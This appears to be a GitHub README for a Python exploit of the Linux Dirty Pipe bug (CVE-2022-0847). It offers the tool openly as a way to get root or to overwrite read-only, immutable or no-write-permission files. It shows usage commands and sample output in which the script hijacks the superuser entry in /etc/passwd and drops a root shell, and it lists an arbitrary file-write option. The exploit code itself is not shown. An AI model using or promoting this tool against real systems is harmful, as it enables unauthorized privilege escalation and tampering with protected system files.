/dirtyPipe-automaticRoot

CVE-2022-0847 Python exploit to get root or write a no write permission, immutable or read-only mounted file.

Primary LanguagePythonGNU General Public License v3.0GPL-3.0

Dirty Pipe automatic root exploit (CVE-2022-0847)

eae

Dependencies:

  • Python 3.10 or above

How to use:

Automatic root:

$ python3.10 dirtyPipe.py -a
[+] hjacking super user in /etc/passwd
[+] dropipng shell
#  

Write a no write permission, immutable or read-only mounted file:

$ python3.10 dirtyPipe.py -w FILE OFFSET DATA

An oferring from @terabitSec 🦜.